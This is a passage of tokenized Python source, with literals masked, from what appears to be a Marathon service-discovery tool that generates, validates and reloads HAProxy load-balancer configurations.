decode ( '<STR_LIT:utf-8>' ) ) : <EOL> if real_event_data [ : <NUM_LIT:6> ] == "<STR_LIT>" : <EOL> event = Event ( data = real_event_data [ <NUM_LIT:6> : ] ) <EOL> yield event <EOL> @ property <EOL> def host ( self ) : <EOL> return next ( self . __cycle_hosts ) <EOL> def has_group ( groups , app_groups ) : <EOL> if '<STR_LIT:*>' in groups : <EOL> return True <EOL> if len ( groups ) == <NUM_LIT:0> and len ( app_groups ) == <NUM_LIT:0> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if ( len ( frozenset ( app_groups ) & groups ) ) : <EOL> return True <EOL> return False <EOL> def config ( apps , groups , bind_http_https , ssl_certs , templater ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> config = templater . haproxy_head <EOL> groups = frozenset ( groups ) <EOL> _ssl_certs = ssl_certs or "<STR_LIT>" <EOL> _ssl_certs = _ssl_certs . split ( "<STR_LIT:U+002C>" ) <EOL> if bind_http_https : <EOL> http_frontends = templater . haproxy_http_frontend_head <EOL> https_frontends = templater . haproxy_https_frontend_head . format ( <EOL> sslCerts = "<STR_LIT:U+0020>" . join ( map ( lambda cert : "<STR_LIT>" + cert , _ssl_certs ) ) <EOL> ) <EOL> userlists = str ( ) <EOL> frontends = str ( ) <EOL> backends = str ( ) <EOL> http_appid_frontends = templater . haproxy_http_frontend_appid_head <EOL> apps_with_http_appid_backend = [ ] <EOL> http_frontend_list = [ ] <EOL> https_frontend_list = [ ] <EOL> for app in sorted ( apps , key = attrgetter ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> if app . haproxy_groups : <EOL> if not has_group ( groups , app . haproxy_groups ) : <EOL> continue <EOL> else : <EOL> if not has_group ( groups , app . groups ) : <EOL> continue <EOL> logger . debug ( "<STR_LIT>" , app . appId ) <EOL> backend = app . appId [ <NUM_LIT:1> : ] . replace ( '<STR_LIT:/>' , '<STR_LIT:_>' ) + '<STR_LIT:_>' + str ( app . servicePort ) <EOL> logger . debug ( "<STR_LIT>" , <EOL> app . bindAddr , app . servicePort , backend ) <EOL> if app . hostname : <EOL> app . 
mode = '<STR_LIT:http>' <EOL> if app . authUser : <EOL> userlist_head = templater . haproxy_userlist_head ( app ) <EOL> userlists += userlist_head . format ( <EOL> backend = backend , <EOL> user = app . authUser , <EOL> passwd = app . authPasswd <EOL> ) <EOL> frontend_head = templater . haproxy_frontend_head ( app ) <EOL> frontends += frontend_head . format ( <EOL> bindAddr = app . bindAddr , <EOL> backend = backend , <EOL> servicePort = app . servicePort , <EOL> mode = app . mode , <EOL> sslCert = '<STR_LIT>' + app . sslCert if app . sslCert else '<STR_LIT>' , <EOL> bindOptions = '<STR_LIT:U+0020>' + app . bindOptions if app . bindOptions else '<STR_LIT>' <EOL> ) <EOL> backend_head = templater . haproxy_backend_head ( app ) <EOL> backends += backend_head . format ( <EOL> backend = backend , <EOL> balance = app . balance , <EOL> mode = app . mode <EOL> ) <EOL> if bind_http_https and app . hostname : <EOL> backend_weight , p_fe , s_fe = generateHttpVhostAcl ( templater , <EOL> app , <EOL> backend ) <EOL> http_frontend_list . append ( ( backend_weight , p_fe ) ) <EOL> https_frontend_list . append ( ( backend_weight , s_fe ) ) <EOL> if app . mode == '<STR_LIT:http>' and app . appId not in apps_with_http_appid_backend : <EOL> logger . debug ( "<STR_LIT>" , app . appId ) <EOL> apps_with_http_appid_backend += [ app . appId ] <EOL> cleanedUpAppId = re . sub ( r'<STR_LIT>' , '<STR_LIT:_>' , app . appId ) <EOL> http_appid_frontend_acl = templater . haproxy_http_frontend_appid_acl ( app ) <EOL> http_appid_frontends += http_appid_frontend_acl . format ( <EOL> cleanedUpAppId = cleanedUpAppId , <EOL> hostname = app . hostname , <EOL> appId = app . appId , <EOL> backend = backend <EOL> ) <EOL> if app . mode == '<STR_LIT:http>' : <EOL> if app . useHsts : <EOL> backends += templater . haproxy_backend_hsts_options ( app ) <EOL> backends += templater . haproxy_backend_http_options ( app ) <EOL> backend_http_backend_proxypass = templater . 
haproxy_http_backend_proxypass ( app ) <EOL> if app . proxypath : <EOL> backends += backend_http_backend_proxypass . format ( <EOL> hostname = app . hostname , <EOL> proxypath = app . proxypath <EOL> ) <EOL> backend_http_backend_revproxy = templater . haproxy_http_backend_revproxy ( app ) <EOL> if app . revproxypath : <EOL> backends += backend_http_backend_revproxy . format ( <EOL> hostname = app . hostname , <EOL> rootpath = app . revproxypath <EOL> ) <EOL> backend_http_backend_redir = templater . haproxy_http_backend_redir ( app ) <EOL> if app . redirpath : <EOL> backends += backend_http_backend_redir . format ( <EOL> hostname = app . hostname , <EOL> redirpath = app . redirpath <EOL> ) <EOL> if app . healthCheck : <EOL> health_check_options = None <EOL> if app . mode == '<STR_LIT>' or app . healthCheck [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> health_check_options = templater . haproxy_backend_tcp_healthcheck_options ( app ) <EOL> elif app . mode == '<STR_LIT:http>' : <EOL> health_check_options = templater . haproxy_backend_http_healthcheck_options ( app ) <EOL> if health_check_options : <EOL> healthCheckPort = app . healthCheck . get ( '<STR_LIT:port>' ) <EOL> backends += health_check_options . format ( <EOL> healthCheck = app . healthCheck , <EOL> healthCheckPortIndex = app . healthCheck . get ( '<STR_LIT>' ) , <EOL> healthCheckPort = healthCheckPort , <EOL> healthCheckProtocol = app . healthCheck [ '<STR_LIT>' ] , <EOL> healthCheckPath = app . healthCheck . get ( '<STR_LIT:path>' , '<STR_LIT:/>' ) , <EOL> healthCheckTimeoutSeconds = app . healthCheck [ <EOL> '<STR_LIT>' ] , <EOL> healthCheckIntervalSeconds = app . healthCheck [ <EOL> '<STR_LIT>' ] , <EOL> healthCheckIgnoreHttp1xx = app . healthCheck [ '<STR_LIT>' ] , <EOL> healthCheckGracePeriodSeconds = app . healthCheck [ <EOL> '<STR_LIT>' ] , <EOL> healthCheckMaxConsecutiveFailures = app . healthCheck [ <EOL> '<STR_LIT>' ] , <EOL> healthCheckFalls = app . 
healthCheck [ <EOL> '<STR_LIT>' ] + <NUM_LIT:1> , <EOL> healthCheckPortOptions = '<STR_LIT>' + <EOL> str ( healthCheckPort ) if healthCheckPort else '<STR_LIT>' <EOL> ) <EOL> if app . sticky : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> backends += templater . haproxy_backend_sticky_options ( app ) <EOL> frontend_backend_glue = templater . haproxy_frontend_backend_glue ( app ) <EOL> frontends += frontend_backend_glue . format ( backend = backend ) <EOL> key_func = attrgetter ( '<STR_LIT:host>' , '<STR_LIT:port>' ) <EOL> for backendServer in sorted ( app . backends , key = key_func ) : <EOL> logger . debug ( <EOL> "<STR_LIT>" , <EOL> backendServer . ip , <EOL> backendServer . port , <EOL> backendServer . host ) <EOL> if backendServer . host != backendServer . ip : <EOL> serverName = re . sub ( <EOL> r'<STR_LIT>' , '<STR_LIT:_>' , <EOL> ( backendServer . host + '<STR_LIT:_>' + <EOL> backendServer . ip + '<STR_LIT:_>' + <EOL> str ( backendServer . port ) ) ) <EOL> else : <EOL> serverName = re . sub ( <EOL> r'<STR_LIT>' , '<STR_LIT:_>' , <EOL> ( backendServer . ip + '<STR_LIT:_>' + <EOL> str ( backendServer . port ) ) ) <EOL> shortHashedServerName = hashlib . sha1 ( serverName . encode ( ) ) . hexdigest ( ) [ : <NUM_LIT:10> ] <EOL> healthCheckOptions = None <EOL> if app . healthCheck : <EOL> server_health_check_options = None <EOL> if app . mode == '<STR_LIT>' or app . healthCheck [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> server_health_check_options = templater . haproxy_backend_server_tcp_healthcheck_options ( app ) <EOL> elif app . mode == '<STR_LIT:http>' : <EOL> server_health_check_options = templater . haproxy_backend_server_http_healthcheck_options ( app ) <EOL> if server_health_check_options : <EOL> healthCheckPort = app . healthCheck . get ( '<STR_LIT:port>' ) <EOL> healthCheckOptions = server_health_check_options . format ( <EOL> healthCheck = app . healthCheck , <EOL> healthCheckPortIndex = app . healthCheck . 
get ( '<STR_LIT>' ) , <EOL> healthCheckPort = healthCheckPort , <EOL> healthCheckProtocol = app . healthCheck [ '<STR_LIT>' ] , <EOL> healthCheckPath = app . healthCheck . get ( '<STR_LIT:path>' , '<STR_LIT:/>' ) , <EOL> healthCheckTimeoutSeconds = app . healthCheck [ <EOL> '<STR_LIT>' ] , <EOL> healthCheckIntervalSeconds = app . healthCheck [ <EOL> '<STR_LIT>' ] , <EOL> healthCheckIgnoreHttp1xx = app . healthCheck [ <EOL> '<STR_LIT>' ] , <EOL> healthCheckGracePeriodSeconds = app . healthCheck [ <EOL> '<STR_LIT>' ] , <EOL> healthCheckMaxConsecutiveFailures = app . healthCheck [ <EOL> '<STR_LIT>' ] , <EOL> healthCheckFalls = app . healthCheck [ <EOL> '<STR_LIT>' ] + <NUM_LIT:1> , <EOL> healthCheckPortOptions = '<STR_LIT>' + <EOL> str ( healthCheckPort ) if healthCheckPort else '<STR_LIT>' <EOL> ) <EOL> backend_server_options = templater . haproxy_backend_server_options ( app ) <EOL> backends += backend_server_options . format ( <EOL> host = backendServer . host , <EOL> host_ipv4 = backendServer . ip , <EOL> port = backendServer . port , <EOL> serverName = serverName , <EOL> cookieOptions = '<STR_LIT>' + <EOL> shortHashedServerName if app . sticky else '<STR_LIT>' , <EOL> healthCheckOptions = healthCheckOptions <EOL> if healthCheckOptions else '<STR_LIT>' , <EOL> otherOptions = '<STR_LIT>' if backendServer . draining else '<STR_LIT>' <EOL> ) <EOL> http_frontend_list . sort ( key = lambda x : x [ <NUM_LIT:0> ] , reverse = True ) <EOL> https_frontend_list . 
sort ( key = lambda x : x [ <NUM_LIT:0> ] , reverse = True ) <EOL> for backend in http_frontend_list : <EOL> http_frontends += backend [ <NUM_LIT:1> ] <EOL> for backend in https_frontend_list : <EOL> https_frontends += backend [ <NUM_LIT:1> ] <EOL> config += userlists <EOL> if bind_http_https : <EOL> config += http_frontends <EOL> config += http_appid_frontends <EOL> if bind_http_https : <EOL> config += https_frontends <EOL> config += frontends <EOL> config += backends <EOL> return config <EOL> def get_haproxy_pids ( ) : <EOL> try : <EOL> return subprocess . check_output ( <EOL> "<STR_LIT>" , <EOL> stderr = subprocess . STDOUT , <EOL> shell = True ) <EOL> except subprocess . CalledProcessError as ex : <EOL> return '<STR_LIT>' <EOL> def reloadConfig ( ) : <EOL> reloadCommand = [ ] <EOL> if args . command : <EOL> reloadCommand = shlex . split ( args . command ) <EOL> else : <EOL> logger . debug ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> if os . path . isfile ( '<STR_LIT>' ) : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> reloadCommand = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> elif ( os . path . isfile ( '<STR_LIT>' ) or <EOL> os . path . isfile ( '<STR_LIT>' ) ) : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> reloadCommand = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> elif os . path . isfile ( '<STR_LIT>' ) : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> reloadCommand = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> else : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> reloadCommand = None <EOL> if reloadCommand : <EOL> logger . info ( "<STR_LIT>" , "<STR_LIT:U+0020>" . join ( reloadCommand ) ) <EOL> try : <EOL> start_time = time . time ( ) <EOL> pids = get_haproxy_pids ( ) <EOL> subprocess . check_call ( reloadCommand , close_fds = True ) <EOL> while pids == get_haproxy_pids ( ) : <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> logger . debug ( "<STR_LIT>" , <EOL> time . time ( ) - start_time ) <EOL> except OSError as ex : <EOL> logger . error ( "<STR_LIT>" , <EOL> "<STR_LIT:U+0020>" . 
join ( reloadCommand ) ) <EOL> logger . error ( "<STR_LIT>" , ex ) <EOL> except subprocess . CalledProcessError as ex : <EOL> logger . error ( "<STR_LIT>" , <EOL> "<STR_LIT:U+0020>" . join ( reloadCommand ) ) <EOL> logger . error ( "<STR_LIT>" , ex ) <EOL> def generateHttpVhostAcl ( templater , app , backend ) : <EOL> staging_http_frontends = "<STR_LIT>" <EOL> staging_https_frontends = "<STR_LIT>" <EOL> if "<STR_LIT:U+002C>" in app . hostname : <EOL> logger . debug ( <EOL> "<STR_LIT>" , app . hostname ) <EOL> vhosts = app . hostname . split ( '<STR_LIT:U+002C>' ) <EOL> acl_name = re . sub ( r'<STR_LIT>' , '<STR_LIT:_>' , vhosts [ <NUM_LIT:0> ] ) + '<STR_LIT:_>' + app . appId [ <NUM_LIT:1> : ] . replace ( '<STR_LIT:/>' , '<STR_LIT:_>' ) <EOL> if app . path : <EOL> if app . authRealm : <EOL> logger . debug ( "<STR_LIT>" , app . path ) <EOL> http_frontend_acl = templater . haproxy_http_frontend_acl_only_with_path_and_auth ( app ) <EOL> staging_http_frontends += http_frontend_acl . format ( <EOL> path = app . path , <EOL> cleanedUpHostname = acl_name , <EOL> hostname = vhosts [ <NUM_LIT:0> ] , <EOL> realm = app . authRealm , <EOL> backend = backend <EOL> ) <EOL> https_frontend_acl = templater . haproxy_https_frontend_acl_only_with_path ( app ) <EOL> staging_https_frontends += https_frontend_acl . format ( <EOL> path = app . path , <EOL> cleanedUpHostname = acl_name , <EOL> hostname = vhosts [ <NUM_LIT:0> ] , <EOL> realm = app . authRealm , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> logger . debug ( "<STR_LIT>" , app . path ) <EOL> http_frontend_acl = templater . haproxy_http_frontend_acl_only_with_path ( app ) <EOL> staging_http_frontends += http_frontend_acl . format ( <EOL> path = app . path , <EOL> backend = backend <EOL> ) <EOL> https_frontend_acl = templater . haproxy_https_frontend_acl_only_with_path ( app ) <EOL> staging_https_frontends += https_frontend_acl . format ( <EOL> path = app . 
path , <EOL> backend = backend <EOL> ) <EOL> for vhost_hostname in vhosts : <EOL> logger . debug ( "<STR_LIT>" , vhost_hostname ) <EOL> http_frontend_acl = templater . haproxy_http_frontend_acl_only ( app ) <EOL> staging_http_frontends += http_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = vhost_hostname <EOL> ) <EOL> if app . path : <EOL> if app . authRealm : <EOL> https_frontend_acl = templater . haproxy_https_frontend_acl_with_auth_and_path ( app ) <EOL> staging_https_frontends += https_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = vhost_hostname , <EOL> appId = app . appId , <EOL> realm = app . authRealm , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> https_frontend_acl = templater . haproxy_https_frontend_acl_with_path ( app ) <EOL> staging_https_frontends += https_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = vhost_hostname , <EOL> appId = app . appId , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> if app . authRealm : <EOL> https_frontend_acl = templater . haproxy_https_frontend_acl_with_auth ( app ) <EOL> staging_https_frontends += https_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = vhost_hostname , <EOL> appId = app . appId , <EOL> realm = app . authRealm , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> https_frontend_acl = templater . haproxy_https_frontend_acl ( app ) <EOL> staging_https_frontends += https_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = vhost_hostname , <EOL> appId = app . appId , <EOL> backend = backend <EOL> ) <EOL> if app . redirectHttpToHttps : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> if app . path : <EOL> haproxy_backend_redirect_http_to_https = templater . haproxy_backend_redirect_http_to_https_with_path ( app ) <EOL> frontend = haproxy_backend_redirect_http_to_https . format ( <EOL> bindAddr = app . 
bindAddr , <EOL> cleanedUpHostname = acl_name , <EOL> backend = backend <EOL> ) <EOL> staging_http_frontends += frontend <EOL> else : <EOL> haproxy_backend_redirect_http_to_https = templater . haproxy_backend_redirect_http_to_https ( app ) <EOL> frontend = haproxy_backend_redirect_http_to_https . format ( <EOL> bindAddr = app . bindAddr , <EOL> cleanedUpHostname = acl_name <EOL> ) <EOL> staging_http_frontends += frontend <EOL> elif app . path : <EOL> if app . authRealm : <EOL> http_frontend_route = templater . haproxy_http_frontend_routing_only_with_path_and_auth ( app ) <EOL> staging_http_frontends += http_frontend_route . format ( <EOL> cleanedUpHostname = acl_name , <EOL> realm = app . authRealm , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> http_frontend_route = templater . haproxy_http_frontend_routing_only_with_path ( app ) <EOL> staging_http_frontends += http_frontend_route . format ( <EOL> cleanedUpHostname = acl_name , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> if app . authRealm : <EOL> http_frontend_route = templater . haproxy_http_frontend_routing_only_with_auth ( app ) <EOL> staging_http_frontends += http_frontend_route . format ( <EOL> cleanedUpHostname = acl_name , <EOL> realm = app . authRealm , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> http_frontend_route = templater . haproxy_http_frontend_routing_only ( app ) <EOL> staging_http_frontends += http_frontend_route . format ( <EOL> cleanedUpHostname = acl_name , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> logger . debug ( <EOL> "<STR_LIT>" , app . hostname ) <EOL> acl_name = re . sub ( r'<STR_LIT>' , '<STR_LIT:_>' , app . hostname ) + '<STR_LIT:_>' + app . appId [ <NUM_LIT:1> : ] . replace ( '<STR_LIT:/>' , '<STR_LIT:_>' ) <EOL> if app . path : <EOL> if app . redirectHttpToHttps : <EOL> http_frontend_acl = templater . haproxy_http_frontend_acl_only ( app ) <EOL> staging_http_frontends += http_frontend_acl . 
format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = app . hostname <EOL> ) <EOL> http_frontend_acl = templater . haproxy_http_frontend_acl_only_with_path ( app ) <EOL> staging_http_frontends += http_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = app . hostname , <EOL> path = app . path , <EOL> backend = backend <EOL> ) <EOL> haproxy_backend_redirect_http_to_https = templater . haproxy_backend_redirect_http_to_https_with_path ( app ) <EOL> frontend = haproxy_backend_redirect_http_to_https . format ( <EOL> bindAddr = app . bindAddr , <EOL> cleanedUpHostname = acl_name , <EOL> backend = backend <EOL> ) <EOL> staging_http_frontends += frontend <EOL> else : <EOL> if app . authRealm : <EOL> http_frontend_acl = templater . haproxy_http_frontend_acl_with_auth_and_path ( app ) <EOL> staging_http_frontends += http_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = app . hostname , <EOL> path = app . path , <EOL> appId = app . appId , <EOL> realm = app . authRealm , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> http_frontend_acl = templater . haproxy_http_frontend_acl_with_path ( app ) <EOL> staging_http_frontends += http_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = app . hostname , <EOL> path = app . path , <EOL> appId = app . appId , <EOL> backend = backend <EOL> ) <EOL> https_frontend_acl = templater . haproxy_https_frontend_acl_only_with_path ( app ) <EOL> staging_https_frontends += https_frontend_acl . format ( <EOL> path = app . path , <EOL> backend = backend <EOL> ) <EOL> if app . authRealm : <EOL> https_frontend_acl = templater . haproxy_https_frontend_acl_with_auth_and_path ( app ) <EOL> staging_https_frontends += https_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = app . hostname , <EOL> path = app . path , <EOL> appId = app . appId , <EOL> realm = app . 
authRealm , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> https_frontend_acl = templater . haproxy_https_frontend_acl_with_path ( app ) <EOL> staging_https_frontends += https_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = app . hostname , <EOL> appId = app . appId , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> if app . redirectHttpToHttps : <EOL> http_frontend_acl = templater . haproxy_http_frontend_acl_only ( app ) <EOL> staging_http_frontends += http_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = app . hostname <EOL> ) <EOL> haproxy_backend_redirect_http_to_https = templater . haproxy_backend_redirect_http_to_https ( app ) <EOL> frontend = haproxy_backend_redirect_http_to_https . format ( <EOL> bindAddr = app . bindAddr , <EOL> cleanedUpHostname = acl_name <EOL> ) <EOL> staging_http_frontends += frontend <EOL> else : <EOL> if app . authRealm : <EOL> http_frontend_acl = templater . haproxy_http_frontend_acl_with_auth ( app ) <EOL> staging_http_frontends += http_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = app . hostname , <EOL> appId = app . appId , <EOL> realm = app . authRealm , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> http_frontend_acl = templater . haproxy_http_frontend_acl ( app ) <EOL> staging_http_frontends += http_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = app . hostname , <EOL> appId = app . appId , <EOL> backend = backend <EOL> ) <EOL> if app . authRealm : <EOL> https_frontend_acl = templater . haproxy_https_frontend_acl_with_auth ( app ) <EOL> staging_https_frontends += https_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = app . hostname , <EOL> appId = app . appId , <EOL> realm = app . authRealm , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> https_frontend_acl = templater . haproxy_https_frontend_acl ( app ) <EOL> staging_https_frontends += https_frontend_acl . 
format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = app . hostname , <EOL> appId = app . appId , <EOL> backend = backend <EOL> ) <EOL> return ( app . backend_weight , <EOL> staging_http_frontends , <EOL> staging_https_frontends ) <EOL> def writeConfigAndValidate ( config , config_file ) : <EOL> if args . dry : <EOL> print ( config ) <EOL> sys . exit ( ) <EOL> fd , haproxyTempConfigFile = mkstemp ( ) <EOL> logger . debug ( "<STR_LIT>" , haproxyTempConfigFile ) <EOL> with os . fdopen ( fd , '<STR_LIT:w>' ) as haproxyTempConfig : <EOL> haproxyTempConfig . write ( config ) <EOL> perms = <NUM_LIT> <EOL> if os . path . isfile ( config_file ) : <EOL> perms = stat . S_IMODE ( os . lstat ( config_file ) . st_mode ) <EOL> os . chmod ( haproxyTempConfigFile , perms ) <EOL> if args . skip_validation : <EOL> logger . debug ( "<STR_LIT>" , <EOL> haproxyTempConfigFile , <EOL> config_file ) <EOL> move ( haproxyTempConfigFile , config_file ) <EOL> return True <EOL> cmd = [ '<STR_LIT>' , '<STR_LIT>' , haproxyTempConfigFile , '<STR_LIT:-c>' ] <EOL> logger . debug ( "<STR_LIT>" + str ( cmd ) ) <EOL> returncode = subprocess . call ( args = cmd ) <EOL> if returncode == <NUM_LIT:0> : <EOL> logger . debug ( "<STR_LIT>" , <EOL> haproxyTempConfigFile , <EOL> config_file ) <EOL> move ( haproxyTempConfigFile , config_file ) <EOL> return True <EOL> else : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return False <EOL> def compareWriteAndReloadConfig ( config , config_file ) : <EOL> runningConfig = str ( ) <EOL> try : <EOL> logger . debug ( "<STR_LIT>" , config_file ) <EOL> with open ( config_file , "<STR_LIT:r>" ) as f : <EOL> runningConfig = f . read ( ) <EOL> except IOError : <EOL> logger . warning ( "<STR_LIT>" ) <EOL> if runningConfig != config : <EOL> logger . info ( <EOL> "<STR_LIT>" ) <EOL> if writeConfigAndValidate ( config , config_file ) : <EOL> reloadConfig ( ) <EOL> else : <EOL> logger . 
warning ( "<STR_LIT>" ) <EOL> def get_health_check ( app , portIndex ) : <EOL> for check in app [ '<STR_LIT>' ] : <EOL> if check . get ( '<STR_LIT:port>' ) : <EOL> return check <EOL> if check . get ( '<STR_LIT>' ) == portIndex : <EOL> return check <EOL> return None <EOL> healthCheckResultCache = LRUCache ( ) <EOL> def get_apps ( marathon ) : <EOL> apps = marathon . list ( ) <EOL> logger . debug ( "<STR_LIT>" , [ app [ "<STR_LIT:id>" ] for app in apps ] ) <EOL> marathon_apps = [ ] <EOL> processed_apps = [ ] <EOL> deployment_groups = { } <EOL> for app in apps : <EOL> deployment_group = None <EOL> if '<STR_LIT>' in app [ '<STR_LIT>' ] : <EOL> deployment_group = app [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> if deployment_group [ <NUM_LIT:0> ] != '<STR_LIT:/>' : <EOL> deployment_group = '<STR_LIT:/>' + deployment_group <EOL> app [ '<STR_LIT:id>' ] = deployment_group <EOL> else : <EOL> processed_apps . append ( app ) <EOL> continue <EOL> if deployment_group in deployment_groups : <EOL> prev = deployment_groups [ deployment_group ] <EOL> cur = app <EOL> if '<STR_LIT>' in prev [ '<STR_LIT>' ] : <EOL> prev_date = dateutil . parser . parse ( <EOL> prev [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> else : <EOL> prev_date = '<STR_LIT>' <EOL> if '<STR_LIT>' in cur [ '<STR_LIT>' ] : <EOL> cur_date = dateutil . parser . 
parse ( <EOL> cur [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> else : <EOL> cur_date = '<STR_LIT>' <EOL> old = new = None <EOL> if prev_date < cur_date : <EOL> old = prev <EOL> new = cur <EOL> else : <EOL> new = prev <EOL> old = cur <EOL> target_instances = int ( new [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> old_tasks = sorted ( old [ '<STR_LIT>' ] , key = lambda task : task [ '<STR_LIT:id>' ] ) <EOL> healthy_new_instances = <NUM_LIT:0> <EOL> if len ( app [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> for task in new [ '<STR_LIT>' ] : <EOL> if '<STR_LIT>' not in task : <EOL> continue <EOL> alive = True <EOL> for result in task [ '<STR_LIT>' ] : <EOL> if not result [ '<STR_LIT>' ] : <EOL> alive = False <EOL> if alive : <EOL> healthy_new_instances += <NUM_LIT:1> <EOL> else : <EOL> healthy_new_instances = new [ '<STR_LIT>' ] <EOL> maximum_drainable = max ( <NUM_LIT:0> , ( healthy_new_instances + old [ '<STR_LIT>' ] ) - <EOL> target_instances ) <EOL> for i in range ( <NUM_LIT:0> , min ( len ( old_tasks ) , <EOL> healthy_new_instances , <EOL> maximum_drainable ) ) : <EOL> old_tasks [ i ] [ '<STR_LIT>' ] = True <EOL> merged = old <EOL> old_tasks . extend ( new [ '<STR_LIT>' ] ) <EOL> merged [ '<STR_LIT>' ] = old_tasks <EOL> deployment_groups [ deployment_group ] = merged <EOL> else : <EOL> deployment_groups [ deployment_group ] = app <EOL> processed_apps . extend ( deployment_groups . values ( ) ) <EOL> SERVICE_PORT_ASSIGNER . reset ( ) <EOL> for app in processed_apps : <EOL> appId = app [ '<STR_LIT:id>' ] <EOL> if appId [ <NUM_LIT:1> : ] == os . environ . get ( "<STR_LIT>" ) : <EOL> continue <EOL> marathon_app = MarathonApp ( marathon , appId , app ) <EOL> if '<STR_LIT>' in marathon_app . app [ '<STR_LIT>' ] : <EOL> marathon_app . groups = marathon_app . app [ '<STR_LIT>' ] [ '<STR_LIT>' ] . split ( '<STR_LIT:U+002C>' ) <EOL> marathon_apps . append ( marathon_app ) <EOL> service_ports = SERVICE_PORT_ASSIGNER . 
get_service_ports ( app ) <EOL> for i , servicePort in enumerate ( service_ports ) : <EOL> if servicePort is None : <EOL> logger . warning ( "<STR_LIT>" ) <EOL> continue <EOL> service = MarathonService ( <EOL> appId , servicePort , get_health_check ( app , i ) ) <EOL> for key_unformatted in label_keys : <EOL> key = key_unformatted . format ( i ) <EOL> if key in marathon_app . app [ '<STR_LIT>' ] : <EOL> func = label_keys [ key_unformatted ] <EOL> func ( service , <EOL> key_unformatted , <EOL> marathon_app . app [ '<STR_LIT>' ] [ key ] ) <EOL> marathon_app . services [ servicePort ] = service <EOL> for task in app [ '<STR_LIT>' ] : <EOL> if not task [ '<STR_LIT:host>' ] : <EOL> logger . warning ( "<STR_LIT>" + <EOL> task [ '<STR_LIT:id>' ] ) <EOL> continue <EOL> if marathon . health_check ( ) and '<STR_LIT>' in app and len ( app [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> alive = True <EOL> if '<STR_LIT>' not in task : <EOL> if not healthCheckResultCache . get ( task [ '<STR_LIT:id>' ] , False ) : <EOL> continue <EOL> else : <EOL> for result in task [ '<STR_LIT>' ] : <EOL> if not result [ '<STR_LIT>' ] : <EOL> alive = False <EOL> healthCheckResultCache . set ( task [ '<STR_LIT:id>' ] , alive ) <EOL> if not alive : <EOL> continue <EOL> task_ip , task_ports = get_task_ip_and_ports ( app , task ) <EOL> if not task_ip : <EOL> logger . warning ( "<STR_LIT>" ) <EOL> continue <EOL> draining = task . get ( '<STR_LIT>' , False ) <EOL> for task_port , service_port in zip ( task_ports , service_ports ) : <EOL> service = marathon_app . services . get ( service_port , None ) <EOL> if service : <EOL> service . groups = marathon_app . groups <EOL> service . add_backend ( task [ '<STR_LIT:host>' ] , <EOL> task_ip , <EOL> task_port , <EOL> draining ) <EOL> apps_list = [ ] <EOL> for marathon_app in marathon_apps : <EOL> for service in list ( marathon_app . services . values ( ) ) : <EOL> if service . backends : <EOL> apps_list . 
append ( service ) <EOL> return apps_list <EOL> def regenerate_config ( apps , config_file , groups , bind_http_https , <EOL> ssl_certs , templater ) : <EOL> compareWriteAndReloadConfig ( config ( apps , groups , bind_http_https , <EOL> ssl_certs , templater ) , config_file ) <EOL> class MarathonEventProcessor ( object ) : <EOL> def __init__ ( self , marathon , config_file , groups , <EOL> bind_http_https , ssl_certs ) : <EOL> self . __marathon = marathon <EOL> self . __apps = dict ( ) <EOL> self . __config_file = config_file <EOL> self . __groups = groups <EOL> self . __templater = ConfigTemplater ( ) <EOL> self . __bind_http_https = bind_http_https <EOL> self . __ssl_certs = ssl_certs <EOL> self . __condition = threading . Condition ( ) <EOL> self . __thread = threading . Thread ( target = self . do_reset ) <EOL> self . __pending_reset = False <EOL> self . __stop = False <EOL> self . __thread . start ( ) 